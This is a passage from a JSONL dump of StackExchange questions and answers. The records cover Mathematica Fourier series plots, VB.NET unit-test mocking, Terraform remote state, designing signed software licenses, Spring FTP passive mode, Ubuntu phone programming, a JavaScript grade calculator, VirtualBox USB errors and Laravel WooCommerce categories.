The first few approximations then look like\n<code>s[n_, x_] := \n 8\/4 + 3\/(9 \u03c0) Sum[(6 (-1)^k)\/(k \u03c0) Cos[(k \u03c0 x)\/\n 2] + (16 (-1)^k + 13)\/(\u03c0 k) Sin[(k \u03c0 x)\/2], {k, 1, n}]\n\npartialsums = Table[s[n, x], {n, 1, 5}];\nPlot[Evaluate[partialsums], {x, -4, 4}]\n<\/code>\n\nTo compare this with <code>f<\/code> we plot the <code>s[5,x]<\/code> and <code>f<\/code> in the same plot:\n<code>Plot[{s[5, x], f[x]}, {x, -2, 2}]\n<\/code>\n\nwhich doesn't seem right to me, so I suspect you made a mistake somewhere in calculating the coefficients.\nCalculating coefficients by hand\nWe could use <code>FourierSeries<\/code> to calculate the partial sums, but this is very slow, and doesn't give produce the general equation for the coefficients. Therefore it's better to calculate the coefficients by hand. The $n$-th coefficient can be calculated according to\n<code>coeff[0] = 1\/4 Integrate[f[x], {x, -2, 2}];\ncoeff[n_] = 1\/4 Integrate[f[x] Exp[I Pi n x\/2], {x, -2, 2}]\n<\/code>\n\n<code>(1\/(2 n^4 \u03c0^4))E^(-I n \u03c0) (-48 + 48 E^(I n \u03c0) - \n 48 I n \u03c0 + 28 n^2 \u03c0^2 - 6 E^(I n \u03c0) n^2 \u03c0^2 + \n 2 E^(2 I n \u03c0) n^2 \u03c0^2 + 12 I n^3 \u03c0^3 - \n I E^(I n \u03c0) n^3 \u03c0^3 - I E^(2 I n \u03c0) n^3 \u03c0^3)\n<\/code>\n\nThen the partial sums are given by\n<code>series[m_, x_] := Sum[Exp[-I Pi n x\/2] coeff[n], {n, -m, m}]\n<\/code>\nPlotting the first few approximations:\n<code>Plot[Evaluate[Table[series[j, x], {j, 0, 5}]], {x, -6, 6}]\n<\/code>\n\nTo see how this compares with the original function <code>f<\/code>:\n<code>Plot[Evaluate[{series[5, x], f[Mod[x, 4, -2]]}], {x, -4, 4}]\n<\/code>\n\nwhich looks a lot better than the before.\nEdit: Real coefficients\nHere, <code>coeff[n]<\/code> are the coefficients for the Fourier series in exponential form, but these can be easily converted to the coefficients for the $\\cos$ and $\\sin$ series, <code>a_n<\/code> and <code>b_n<\/code>, by doing something like\n<code>a[0] = coeff[0];\na[n_] = Simplify[ComplexExpand[coeff[n] + coeff[-n]]];\nb[n_] = Simplify[ComplexExpand[I (coeff[n] - coeff[-n])]];\n<\/code>\nComment: Thanks, This is a very interesting way or technique of doing this. I also like that about how to covert back and forth between the exponential form and the trigonometric forms. That will be very useful. :). Very neat and organized approach.\nAnswer: You can use <code>FourierCoefficient<\/code> to pre-calculate the Fourier coefficients to arbitrary degree and then use the result very effectively.\nThere may be some issues with zero-th degree, therefore I excluded this using <code>Piecewise<\/code>. Here's the main code block:\n<code>f[x_] := Piecewise[{\n {-x^3 - 2 x, -2 < x < 0},\n {-1 + x, 0 <= x <= 2}},\n 0\n];\n Module[{x, fp},\n (* Set parameters so that the integration runs\n from -2 to 2 *)\n fp = {0, -Pi\/2};\n fc = Piecewise[{\n {FourierCoefficient[f[x], x, 0, FourierParameters -> fp], # == 0},\n {ComplexExpand@FourierCoefficient[f[x], x, #, FourierParameters -> fp], True}\n }] &;\n fc = Evaluate \/@ fc;\n];\n<\/code>\nThe output (<code>fc<\/code>) of this is something very unpleasant to look at; however, there's nothing Fourier-related left there, all the hard math has been done already, and only a bunch of elementary functions remain. 
<code>fc<\/code> is now a function of one argument that gives you the $n$-th Fourier coefficient of <code>f<\/code> in no time.\n<code>(* Calculate the first 2001 Fourier coefficients *)\nAbsoluteTiming[Table[fc[n], {n, -1000, 1000}]] \/\/ First\n<\/code>\n\n<code>0.777059 seconds\n<\/code>\n\nTo convert this back to the function, you have to do the partial sum with your hands, for example here are the second, fourth and eightieth partial sums:\n<code>myPartialSums = Table[\n (* The Pi\/2 compensates for the custom FourierParameters, see\n documentation of FourierSeries\/FourierParameters\n under \"more info\" *)\n Re[Sum[fc[k] Exp[-Pi\/2 I k t], {k, -n, n}]],\n {n, {2, 4, 80}}\n];\n<\/code>\n\n<code>A very large output has been generated,\nbut we're luckily not interested in it\nanyway but would rather plot it\n<\/code>\n\n<code>Plot[\n {f[t]} ~Join~ myPartialSums,\n {t, -10, 10},\n PlotRange -> All, \n Evaluated -> True, \n PlotStyle -> {Thick, Automatic, Automatic, Automatic}\n]\n<\/code>\nAnswer: If the summation index goes from 1 to n, as you suggested (?) above, and you make the mod to the Plot function I mentioned\n<code>s[n_, x_] := 8\/4 + 3\/(9 \u03c0) Sum[(6 (-1)^k)\/(k \u03c0) Cos[(k \u03c0 x)\/\n 2] + (16 (-1)^k + 13)\/(\u03c0 k) Sin[(k \u03c0 x)\/2], {k, 1, n}]\n\npartialsums = Table[s[n, x], {n, 1, 5}];\n\nf[x_] = Piecewise[{{-x^3 - 2 x, -2 < x < 0}, {-1 + x, 0 <= x <= 2}}]\n\nPlot[Evaluate@Tooltip[Append[partialsums, f[x]]], {x, -4 Pi, 4 Pi}]\n<\/code>\nThen you get the following figure:\nComment: Your plot is running into a known issue with mma which I can't seem to find a reference to. Since `Plot` has the `Attribute` `HoldAll`, it is treating `Append[partialsums, f[x]]` as a single function, and hence colors all the lines the same color. To get around this either use `Evaluate@Append[...]` or `Plot[#, ...]& @ Append[...]`.\nComment: @nightowl and David, I found the [discussion](http:\/\/mathematica.stackexchange.com\/q\/1731\/52) on this.\nComment: Interesting-I was wondering about that! Thanks!\nComment: Thats nice David. I was wondering what was going on with the colors. I was fooling around with it to get something like this and then I seen that rcollyer figured it out. Thank You, that will be a useful option to remember when doing these. Thank You! 
`:)`\n","meta":{"source":"mathematica.stackexchange","title":"Plotting Partial Sums of Fourier Series","dup_signals":{}},"subset":"stackexchange"} +{"text":"Pass an Mock object to class\n\nQuestion: \nIn below code block i need to use the object of class RETTemplateLoader(created as \"obiz\") inside method of \"obizEmail.GetEmailContent\", hence i created the Mock for class BizCampaignEmailSend(created as \"obizEmail\") but i don't find how to link this two objects so that while the method \"GetEmailContent\" gets invoked, i'm expecting it return <code>\"<HTML>\"<\/code>(my hard coded text)\n<code><TestMethod(), Owner(\"TestEmail\"), TestCategory(\"Testing\")> _\n Public Sub GetEmailContent()\n Using oClass As New SessionClass(\"UnitTesting\", Me.GetType.Name)\n Dim oSvcJPEmailProductsCampaignStruct As New SvcJPEmailProductsCampaignStruct\n 'Class obj 1\n Dim obiz = MockRepository.GeneratePartialMock(Of RETTemplateLoader)(New Object() {\"\", \"\", \"\", False})\n obiz.Stub(Function(c) c.LoadEmailTemplateNew(oClass)).Return(\"<HTML>\")\n 'Class obj 2\n Dim obizEmail = MockRepository.GeneratePartialMock(Of BizCampaignEmailSend)()\n Assert.AreEqual(obizEmail.GetEmailContent(oClass , oSvcJPEmailProductsCampaignStruct), \"<HTML>\")\n End Using\n End Sub\n<\/code>\nHere is my method which i need to give test coverage\n<code>Public Overridable Function GetEmailContent(ByVal oClass As SessionClass, ByVal oCampaignStruct As SvcJPEmailProductsCampaignStruct) As String \n Dim sEmailTemplate As String = String.Empty\n Dim oRETTemplateLoader As New RETTemplateLoader(oCampaignStruct.CampaignContent, \"\", oCampaignStruct.AutoResponseDID, True)\n sEmailTemplate = oRETTemplateLoader.LoadEmailTemplateNew(oClass)\n Return sEmailTemplate\nEnd Function\n<\/code>\nAnswer: I don't think you need to do any linking here. You don't need to call your SUT (System Under Test) as mock object in this case. I don't see benefit of setting up a stub for returning \"\" by invoking \n\noRETTemplateLoader.LoadEmailTemplateNew(oClass)\n\nand then having a mock object for your SUT which calls the above method and expecting it to return what you have mocked already. Your SUT doesn't have much behaviour.\nThe only thing I would suggest it to verify whether the oRETTemplateLoader.LoadEmailTemplateNew(oClass) is called.\nSomething like below. (Note I'm not VB.NET expert but you should be able to fix any syntax errors. I 'll just show my intention.)\n<code> <TestMethod(), Owner(\"TestEmail\"), TestCategory(\"Testing\")> _\nPublic Sub GetEmailContent()\n Using oClass As New SessionClass(\"UnitTesting\", Me.GetType.Name)\n Dim oSvcJPEmailProductsCampaignStruct As New SvcJPEmailProductsCampaignStruct\n 'Set your expectation\n Dim obiz = MockRepository.GeneratePartialMock(Of RETTemplateLoader)(New Object() {\"\", \"\", \"\", False})\n obiz.Expect(Function(c) c.LoadEmailTemplateNew(oClass)).Return(\"some string\")\n\n 'Call SUT\n Dim sut As New BizCampaignEmailSend\n Dim r = sut.GetEmailContent(oClass , oSvcJPEmailProductsCampaignStruct)\n\n 'Verify\n obiz.VerifyAllExpectations()\n End Using\nEnd Sub\n<\/code>\n","meta":{"source":"stackoverflow","title":"Pass an Mock object to class","dup_signals":{}},"subset":"stackexchange"} +{"text":"Terraform - Using a config file for referencing backend data\n\nQuestion: The documentation explains that you can use a config file when setting up your backend. 
You partially configure the backend as part of your main.tf file and then point it towards a config file inline as part of the terraform init command.\nThis works okay, but when it comes to accessing data from this backend it seems as though you have to hardcode in the access credentials. I'm wondering essentially if there's any way for me to point the backend to its config file as part of my main.tf file. Something like this:\n<code>data \"terraform_remote_state\" \"vnet\"\n{\n backend = \"azurerm\"\n\n config {\n key = \"path\/to\/state\/file\"\n file = \"path\/to\/config\/file.tf\"\n }\n}\n<\/code>\nIf this feature exists I can't find the documentation for it. Am I missing something or is it just not possible right now?\nComment: As far as I know that's not possible right now. A lot of the remote state use cases can now be more nicely handled with data source instead (although I'm not so sure about the state of the `azurerm` provider) so I'd recommend using that where possible.\nAnswer: I am doing exactly what you are asking and I run everything from Cloud Shell. I keep everything in Github repos and then pull the repo down to a folder in my Cloud Shell. Here is how...\nFirst, create a shell script that has the following lines in it:\n<code>#!\/bin\/bash\nset -eo pipefail\n\n# The block below will grab the access key for the storage account that is used\n# to store state files\n\nsubscription_name=\"Infrastructure\"\ntfstate_storage_resource_group=\"terraform-state-rg\"\ntfstate_storage_account=\"dosinvesttfstatesa\"\n\naz account set --subscription \"$subscription_name\"\ntfstate_storage_access_key=$(\n az storage account keys list \\\n --resource-group \"$tfstate_storage_resource_group\" \\\n --account-name \"$tfstate_storage_account\" \\\n --query '[0].value' -o tsv\n)\n\necho \"\"\necho \"Terraform state storage account access key:\"\necho $tfstate_storage_access_key\necho \"\"\n\nterraform apply \\\n -var \"tfstate_access_key=$tfstate_storage_access_key\"\n<\/code>\nSecond, add the lines below to your main.tf file to read in the data from your backend:\n<code>data \"terraform_remote_state\" \"rg\" {\n backend = \"azurerm\"\n\n config {\n storage_account_name = \"${var.tfstate_storage_account}\"\n container_name = \"${var.tfstate_container}\"\n key = \"${var.tfstate_rgstate_file}\"\n access_key = \"${var.tfstate_access_key}\"\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Terraform - Using a config file for referencing backend data","dup_signals":{}},"subset":"stackexchange"} +{"text":"Creating a license system based on asymmetric encryption (RSA or ECDSA)\n\nQuestion: I've spent a couple of days researching the topic of creating a license system for my desktop software. While I fully understand that there's no perfect copy protection, this approach seems to have the best balance for me.\nThere are a couple of details that I can't fully get my head around before starting with the implementation. I'd really appreciate if you could share your thoughts on the following topics:\n\n1. Encrypt or Sign? (answered -> sign)\nIn my understanding both encrypting and signing the license information on my server-side with my private key would work. The desktop client would either have to decrypt or verify the signature of the license text-file with the embedded public key. The only difference I see is that in the latter case the content of the license file is humanly readable while the encrypted version is not. \nWould you rather encrypt or sign the license file? Why?\n\n2. 
Hash or directly encrypt\/sign the License? (answered -> signing automatically hashes it)\nLet's say the license information text consists of about 300 bytes. Would you recommend to sign\/encrypt it directly, or hash it and then sign\/encrypt the hash? I'm asking this because I've read different statements that asymmetric encryption isn't suitable for large data. But what's the limit?\n\n3. Revoke a License?\nWhat's the best way to revoke an already issued license? I understand that having an online blacklist is probably the most accurate solution, however I don't want the software to be dependent on an Internet connection and the reliability of my server. So I guess the alternative is to have black-listed licenses within the application being maintained with new releases? In that case what exactly would I create a list of? The signed\/encrypted license (probably too big with a growing list)? A hash of it? Something completely different?\n\nEdit:\nCombining the replies so far I guess the first two questions can be combined to \"Sign it and don't care about the content length\".\nThe third question however remains unclear to me. I'd like to point out that I don't want to have a dependance on an online server for not bothering honest customers. After all forced online connections bring more annoyance than security.\nSo there needs to be kind of an \"offline solution\", even if less secure. Please reconsider question #3 under this aspect.\nActually I'd even like to extend question #3 by the following scenario:\n4. Replace stolen\/hacked private key\nIn a worst case scenario the private key might get stolen or somehow hacked, so the attacker is able to create a license generator himself. What would I have to do in this case? I can't blacklist some licenses like in #3, so instead I'd have to replace the key pair, wouldn't I? However in my understanding that would also mean that all customers would require to receive new licenses when updating to a new version with the replaced public key. Is there some clever solution for only blacklisting licenses with the old key pair that have been created after a certain date so the already created licenses before some date stay intact? I understand that it'd require some kind of timestamp system that an attacker can't fake. Is there such a thing?\n\nThank you!\nComment: No, I mean that in case I find out that a license is being abused (e.g. shared on the Internet) I'd like to invalidate\/revoke it. I'll edit my question accordingly.\nComment: For scenario #4, approach that is simple and has been used in practice is whitelisting. Note: The whitelist can get very large.\nComment: @user4982 What exactly would I whitelist? The issued licenses? In that case I'd have to release a new version of the software after each purchase!?\nAnswer: Sign the license text. There's nothing confidential in the license text, so you don't need confidentiality.\nIf possible, include some kind of customer ID or something in the license that links it to a particular customer.\nStandard digital signature schemes can easily sign arbitrary-length messages. Don't worry about the length of the message. (Internally, they hash the message with a collision-resistant cryptographic hash, then sign the hash, roughly speaking, which is how they can handle arbitrary-length messages efficiently. 
But you shouldn't need to know that, if you are using a standard implementation of a well-vetted crypto algorithm.)\nOne approach to revocation is to have your client software contact a central server for periodic download of the revocation list. The alternative is to have your server issue short-lived signed authorizations, and require the client to periodically contact the server when each one expires to get a new one (and the server can withhold providing any new authorizations once you revoke that customer). In either case, make sure that the client can continue to use your software for some set period while they are offline without destroying their access to the software, or your customers might become very mad at you.\nThere is no purely offline solution to revocation. If the customer has no network connectivity, there's no way to revoke their software license early. If in the absence of revocation their software license would be valid until time $T$, and at time $t<T$ you want to revoke them, you can't. Consider: from the client's perspective, there is nothing that lets them distinguish between whether they are revoked or not, if they don't have any communication whatsoever with the server or anyone else. So if you expect clients to be offline, it becomes a tradeoff between \"the lifetime of a license\" (how long before it expires?) vs \"speed of revocation\" (how long before revocation takes effect?). If you issue licenses that are good for one year, then revocation won't take effect until that year is up -- if clients are offline.\nWhat you can do is refuse to provide software upgrades to clients whose software has been upgraded. This won't prevent them from continuing to use the older version of the software, though, for as long as their license is valid. Optionally, you could also have the client software try to connect to the Internet whenever possible, and if the client goes for a certain time period without having being able to reach the server, you could have the client disable itself; whether this is acceptable will depend upon how you expect your legitimate customers will use your software.\nIf your private signing key is stolen, you are hosed. There's nothing you can do to prevent whoever holds that signing key from generating illegitimate licenses that the existing version of your software will accept as valid. All you can do is change the public key that's hardcoded into the software, in the next software update (so people won't be able to use that newer version of software using licenses signed by the old stolen key) -- but this won't stop people from using the older version of your software. So try to not let your signing key get stolen.\nFinally, remember that these licensing schemes provide a speedbump, not strong security. They exist to keep honest people honest, but they will not be effective at deterring or stopping dedicated malicious people from bypassing your copy protection system. Therefore, whatever you do, try to ensure that your license system doesn't inconvenience honest users too much. Don't drive them to download pirated copies because they're less annoying than the actual paid-up copy.\nComment: I fully agree with you. You basically confirmed my personal thoughts which makes it easier for me to proceed. Also you're right that I *shouldn't need* to know the technical background, but to create a solid solution it really helps to have a good background understanding. 
If possible please have another look at my question #3 again as it remains unclear to me. I actually extended it with a related question #4. I'd like to hear your thoughts about this.\nComment: @CodeX, sure. I expanded my answer to elaborate further on revocation (your question #3) and stolen private keys (your question #4).\nAnswer: First off: if you sign the licensing information server-side what keeps hundreds of users from using the same license? I\u00b4d rather create asymmetric key pairs and provide the private key along with an ID as the license code. The client can then proove to the server that it owns a valid license. This already ansewers question 3: revoking a license can be easily done server-side. Also, preventing a software from going online is a lot harder than provide a working serial. (while still easy for the ones who know how).\nFor question 1:\nI think signing is the best option when working in the way i described above.\nThis also answers question two: when the client needs to proove to your server that it owns a valid license, only a small amount of data needs to be signed. This can be a fixed number, e.g. $e^{20}$. Hashing is not required. You could even leave the padding since buying your software is most likely cheaper than the easiest attacks on a cryptographic key.\nP.S.: Most serial codes consist of about 24 characters. In Hex-Notation this only gives you a 96 bit key. However, if you encode it base-36 (so 0-Z), you can fit 124 bit into 24 characters.\nComment: If you \"create asymmetric key pairs and provide the private key along with an ID as the license code\" $\\hspace{.17 in}$ \"what keeps hundreds of users from using the same license\" code? $\\;$\nComment: By not accepting the license code if another program with the same id is already running.\nComment: That would make it an \"always on\" software, which in my experience every user (including me) hates. I'd like to have a reasonable protection while not annoying honest customers.\nComment: @marstato : $\\:$ Anyone could just change the ID, since it's not tied to anything else they have. $\\hspace{.85 in}$\nComment: @CodeX: if the software cannot connect to your server you just consider the license valid.\nRickDemer: The ID is tied to a license. The software sends its ID and signed data, the server checks the signature with the correspponding public-key.\nComment: @marstato : $\\;\\;\\;$ What signed data? $\\:$ Since the license-holder has the private key for their key-pair, the license-holder could sign _any_ ID with that. $\\;\\;\\;\\;\\;\\;\\;$\nComment: What the data is, is not really important. Still, ID and License key are bound together. Say i am User 10815 and my license key is ABCDF487. I sign a some data (a timestamp or my id or whatever) with that key. Then i send ID and key to the server. The server then checks the signature with the public-key related to the ID. If that signature is valid i have proven to own **the** license for that ID.\nComment: _provide the private key_ : **NO!**, the private key is, indeed, private, and must be kept secret!\nComment: @gog did you understand how i intend to use the key in this scheme? Its never used for encryption and is never supposed to be.\nComment: I _think_ I understood it. And it still feels completely wrong to me to distribute a private key: since the user owns the private key, it can sign **any** ID with that. So, what is the point in signing the ID? Simply provide the ID to the user, then let him send it to the server. 
I think you are using cryptography in a wrong way here. The only one that should have the right to sing something here is the licensing server.\nComment: @gog i intend the private key to enable a license holder to proof having a valid license without giving a man-in-the-middle the chance to get hold of the actual license. I agree that distributing private keys is bad; however letting licence holders generate their own key pairs and send the public key in doesn't fit OPs requirement of distributing licenses.\nComment: If you are worried about a MITM, you have a _secret_ that you want to send to the server. And, sending a secret to the server is accomplished by _encrypting_ the plaintext (ID) with the **public** key, not the private one. But the MITM is a totally different problem here.\nAnswer: The problem with DRM is that the keys must be revealed to the end user machine and thus susceptible to interception. Not to mention I believe that the Sony PlayStation uses ECDSA to secure its firmware and it got cracked. \nComment: Sony got its \"DRM\" system cracked [because of their poor implementation of the ECDSA asymmetric cryptography](https:\/\/arstechnica.com\/gaming\/2010\/12\/ps3-hacked-through-poor-implementation-of-cryptography\/). The main difference between symmetric and asymmetric cryptography is that you don't need to share a single secret key between \"writer\" and \"reader\", but there is a private one and a public one (that can be shared).\n","meta":{"source":"crypto.stackexchange","title":"Creating a license system based on asymmetric encryption (RSA or ECDSA)","dup_signals":{}},"subset":"stackexchange"} +{"text":"FTP issues with FTP inbound channel adapter\n\nQuestion: Our project we are using ftp:inbound-channel-adapter to poll files from the FTP server.it working fine.But in between the polling is not working.when i see the FTP server logs i see \"425 Can't open data connection.\" now when i restart or stop and start the ftp:inbound-channel-adapter again its polling properly.This issue is repeatedly occurring to solve i need to stop\/start the ftp:inbound-channel-adapter.ftp:inbound-channel-adapter is running in linux OS.\nAm using spring-integration 3 just to more clear i have included the xsd info \n(spring-integration-3.0.xsd,spring-integration-ftp-3.0.xsd)\nis there any specific client mode i need to set for FTP i.e Active(local\/remote) \/Passive(local\/remote) etc?\nbelow my ftp:inbound-channel-adapter configuration \n<code><bean id=\"ftpClientFactory\" class=\"org.springframework.integration.ftp.session.DefaultFtpSessionFactory\">\n <property name=\"host\" value=\"abcd.com\"\/>\n <property name=\"port\" value=\"21\"\/>\n <property name=\"username\" value=\"userid\"\/>\n <property name=\"password\" value=\"password\"\/>\n <\/bean>\n\n<int-ftp:inbound-channel-adapter id=\"ftpInbound\"\n channel=\"ftpChannel\"\n session-factory=\"ftpClientFactory\"\n auto-create-local-directory=\"true\"\n delete-remote-files=\"true\"\n remote-directory=\"\/\" \n local-filename-generator-expression=\"new java.text.SimpleDateFormat('yyyy-MM-dd-hhmmssSSS').format(new java.util.Date()) + '.'+ #this\" \n local-directory=\"${ftp.sync.folder}\"\n remote-file-separator=\"\/\">\n <\/int-ftp:inbound-channel-adapter>\n<\/code>\nso not sure i can do something in the FTP server.but i like to see is there any option in ftp:inbound-channel-adapter or any thing you guy suggest so that whenever FTP server throws \"425 Can't open data connection.\" instead of manually stop\/start the 
ftp:inbound-channel-adapter, is there any option or automatic way to make this work? Thanks\nAdded info on Spring Integration version and FTP session factory.\nComment: Please show your Spring Integration version and add your session factory configuration to the question.\nAnswer: There are 2 ways to connect to the FTP server: active and passive mode.\nActive mode: the FTP server has to make the data connection to the port specified by the client\n(firewall issues arise if that port is blocked by a firewall, and you will get the 425 data connection error).\nPassive mode: the client has to make the data connection to the port specified by the FTP server\n(no firewall issues on the client side. Also, we can configure the passive ports on the FTP server and make sure these ports are not blocked by the FTP server's firewall.)\nIf you do not specify any clientMode in the FTP session factory it defaults to active mode, i.e. clientMode=0.\nSo I had a firewall issue which caused the 425 data connection issue. After I turned the firewall off it worked well. So I then changed my FTP session factory to use passive mode, so the FTP server never cares about the client's firewall:\n<code><bean id=\"ftpClientFactory\" class=\"org.springframework.integration.ftp.session.DefaultFtpSessionFactory\">\n <property name=\"host\" value=\"abcd.com\"\/>\n <property name=\"port\" value=\"21\"\/>\n <property name=\"username\" value=\"userid\"\/>\n <property name=\"password\" value=\"password\"\/>\n<!-- 2 passive mode -->\n<property name=\"clientMode\" value=\"2\"\/>\n<\/bean>\n<\/code>\nThis way the FTP server never cares about the client's firewall.\nA very good post about FTP: http:\/\/slacksite.com\/other\/ftp.html\n","meta":{"source":"stackoverflow","title":"FTP issues with FTP inbound channel adapter","dup_signals":{}},"subset":"stackexchange"} +{"text":"Will I be able to run Java, C or Python natively in Ubuntu Phone as I would on a PC?\n\nQuestion: The Ubuntu Phone by Meizu is released tomorrow for the European audience. I've been looking around for information on it, but the only things I can find are some hands-on reviews that don't answer the most important - for me - thing: The Ubuntu phones are (or will be?) supposed to be turned into a fully fledged desktop system once connected to an external screen. Therefore I assume that the user will be able to run and compile programs as they would on a non-mobile Ubuntu system.\nSo my question is, will the Ubuntu Phone OS in the new phone by Meizu (MX4) be able to do that?\nWill I be able to install C\/Python\/Java etc. on it, the way I would on a desktop\/laptop, and compile or run the equivalent programs?\nIf that feature is not available yet in the Ubuntu Phone OS, is anyone aware whether there are plans for it to be implemented?\nThanks!\nAnswer: I have a BQ Aquarius E4.5 running Ubuntu 15.04 (r23). It comes with Python 3 (just remember to start \"python3\" - \"python\" does not exist and does not symlink to Python 3) so that's a start.\nI can't see any gcc, cc, or Java on the phone, and no hits on \"gcc\" or \"compiler\" or \"java\" in the Ubuntu Store. If you make the file system read-write you should be able to install all kinds of stuff directly via apt-get but will then lose out on the over-the-air updates as I understand it. However, for developer work that is probably OK?\nComment: You can already get to a root prompt via sudo, for instance run `sudo su -`. 
But you can't install packages with `apt-get` because the file system is read-only. There is some more information about it here: [link](http:\/\/askubuntu.com\/questions\/380258\/how-to-change-the-ubuntu-installation-to-read-write-mode-on-a-mobile-device) but I don't know how up-to-date that information still is. I haven't dared try it myself yet.\nComment: Wow, very interesting that python3 would run out of the box! Can you elaborate on \"making the file system read-write\"? Do you mean running as root?\n","meta":{"source":"askubuntu","title":"Will I be able to run Java, C or Python natively in Ubuntu Phone as I would on a PC?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Issues with displaying answer of calculations in java\/html Grade Calculator\n\nQuestion: I seem to be having issues with the display of the answers: I need a letter grade in one box and the number grade in the other when the Calculate button is clicked.\nBut neither wants to display. I have tried <code>onclick<\/code> several ways but nothing works.\nI have done what I can and am so confused as to why it's not working.\n\n
Such as onclick=\"calculategrades()\" ? And pass a grade number?\nComment: Btw this is JavaScript and html not java.\nAnswer: Try this, just a guess? do to the way you code is posted I can not test.\nchange \n<code>var display = document.getElementById('numbergrade');\n<\/code>\nto \n<code>document.getElementById(\"numbergrade\").innerHTML = total;\n<\/code>\nthen call calculategrades() passing total into it so it has something to work with.\nthen change\n<code>return letterGrade;\n<\/code>\nto \n<code>document.getElementById(\"lettergrade\").innerHTML = lettergrade;\n<\/code>\nAnswer: Here are your fixed codes\n\n<code>function calculateGrades(number) {\n var letterGrade = \"F\";\n if (number <= 59)\n letterGrade = \"F\";\n else if (number >= 60 && number <= 66)\n letterGrade = \"D\";\n else if (number >= 67 && number <= 69)\n letterGrade = \"D+\";\n else if (number >= 70 && number <= 76)\n letterGrade = \"C\";\n else if (number >= 77 && number <= 79)\n letterGrade = \"C+\";\n else if (number >= 80 && number <= 86)\n letterGrade = \"B\";\n else if (number >= 87 && number <= 89)\n letterGrade = \"B+\";\n else if (number >= 90 && number <= 100)\n letterGrade = \"A\";\n return letterGrade;\n}\n\nfunction grade() {\n var test1 = parseFloat(document.getElementById('test').value * 0.20);\n var test2 = parseFloat(document.getElementById('test3').value * 0.20);\n var finalexam = parseFloat(document.getElementById('exam').value * 0.30);\n var labs = parseFloat(document.getElementById('labs').value * 0.25);\n var project = parseFloat(document.getElementById('project').value * 0.25);\n var quizzes = parseFloat(document.getElementById('quiz').value * 0.5);\n var total = test1 + test2 + finalexam + labs + project + quizzes;\n return total;\n}\n\nfunction showGrades() {\n var number = grade();\n var letter = calculateGrades(number);\n document.getElementById('numbergrade').value = number;\n document.getElementById('lettergrade').value = letter;\n}<\/code>\n<code><form>\n <table>\n <thead>\n <tr>\n <th colspan=\"2\">Score<\/th>\n <\/tr>\n <\/thead>\n <tr>\n <td>Test 1<\/td>\n <td><input type=\"number\" name=\"test\" id=\"test\" \/><\/td>\n <\/tr>\n <tr>\n <td>Test 2<\/td>\n <td><input type=\"number\" name=\"test2\" id=\"test3\" \/><\/td>\n <\/tr>\n <tr>\n <td>Final Exam<\/td>\n <td><input type=\"number\" name=\"exam\" id=\"exam\" \/><\/td>\n <\/tr>\n <tr>\n <td>Labs<\/td>\n <td><input type=\"number\" name=\"labs\" id=\"labs\" \/><\/td>\n <\/tr>\n <tr>\n <td>Project<\/td>\n <td><input type=\"number\" name=\"project\" id=\"project\" \/><\/td>\n <\/tr>\n <tr>\n <td>Quizzes<\/td>\n <td><input type=\"number\" name=\"quiz\" id=\"quiz\" \/><\/td>\n <\/tr>\n <tr>\n <td colspan=\"4\" style=\"text-align: center\"><input type=\"button\" name=\"total\" id=\"total\" value=\"Calculate\" onclick=\"showGrades()\" \/><\/td>\n <\/tr>\n <tfoot>\n <tr>\n <th><input type=\"text\" name=\"numbergrade\" id=\"numbergrade\" \/><\/th>\n <th><input type=\"text\" name=\"lettergrade\" id=\"lettergrade\" \/><\/th>\n <\/tr>\n <\/tfoot>\n <\/table>\n\n\n<\/form><\/code>\n\nYou had mistyped a lot and also you never called the function calculateGrades and did not accept argument in calculateGrades so you were using some global variable \"number\" and you did not set the result of function grade as value to numbergrade\nComment: nice work Petr I was just muddling my way thru that missing function\nComment: THAT WORKED! Thanks. I initially added the number but it didn't work. 
It does now!\n","meta":{"source":"stackoverflow","title":"Issues with displaying answer of calculations in java\/html Grade Calculator","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't attach USB Device in VirtualBox Error Message\n\nQuestion: I'm trying to connect to a 32 bit Windows 10 virtual machine on my MacBook. However I am receiving the error messages in the picture below. My VirtualBox version is 7.0.10.\n\nI have:\n\nEnabled USB 3.0\nInstalled the extension pack for 7.0.10\nEjected the flash drive from my host machine\n\"Insert Guest Additions CD image\" does nothing\n\nAny help is appreciated.\nAnswer: Fixed it. I had to download an older version of Virtual Box.\n","meta":{"source":"stackoverflow","title":"Can't attach USB Device in VirtualBox Error Message","dup_signals":{}},"subset":"stackexchange"} +{"text":"Laravel Corcel WooCommerce - Add product categories\n\nQuestion: I am using the laravel package \"corcel\/woocommerce\" and I am trying to attach product categories to the created product.\n<code> $product = Product::create([\n 'post_title' => 'Product name',\n 'post_content' => 'Post description',\n 'post_status' => 'publish',\n 'post_type' => 'product'\n ]\n );\n $product->createMeta([\n '_sku' => '1234',\n '_regular_price' => '10.00',\n '_sale_price' => '5.00',\n '_thumbnail_id' => 10\n \/\/ other wp_postmeta product meta values...\n ]);\n<\/code>\nHere is where I am trying to add a category:\n<code>$product->categories()->create([\n'cat_name' => 'Test'\n]);\n<\/code>\nBut I get the following error:\n<code> Illuminate\\Database\\Eloquent\\MassAssignmentException \n\n Add [cat_name] to fillable property to allow mass assignment on [Corcel\\WooCommerce\\Model\\ProductCategory][.][1]\n<\/code>\nDoes anyone have any ideas about how I can attach a WooCommerce category to the product please?\nAnswer: in your model <code>ProductCategory<\/code> you should define the $fillable attribute to support mass assignment:\n<code>class ProductCategory extends Model\n{\n protected $fillable = ['cat_name']; \/\/ not only cat_name but also all fillable attributes\n}\n<\/code>\nif you can't change the ProductCategory model, the change the way you save it:\n<code>$productCategory= new ProductCategory();\n$productCategory->cat_name='test'; \/\/ if the is another required attributes, fill them.\n$productCategory->save();\n$product->categories()->attach($productCategory->id);\n<\/code>\nComment: Thank you for your suggestion. `ProductCategory` is within the Corcel package and when I changed this, it didn't work unfortunately. I believe this would be good if I wasnt using the package.\nComment: I suggest then changing the way you create ProductCategory, try the update answer\nComment: Thank you so much for your help, unfortunately this didnt work. I know normally in Laravel this would work. I have left an issue request on the [github repo](https:\/\/github.com\/corcel\/woocommerce\/issues\/21). 
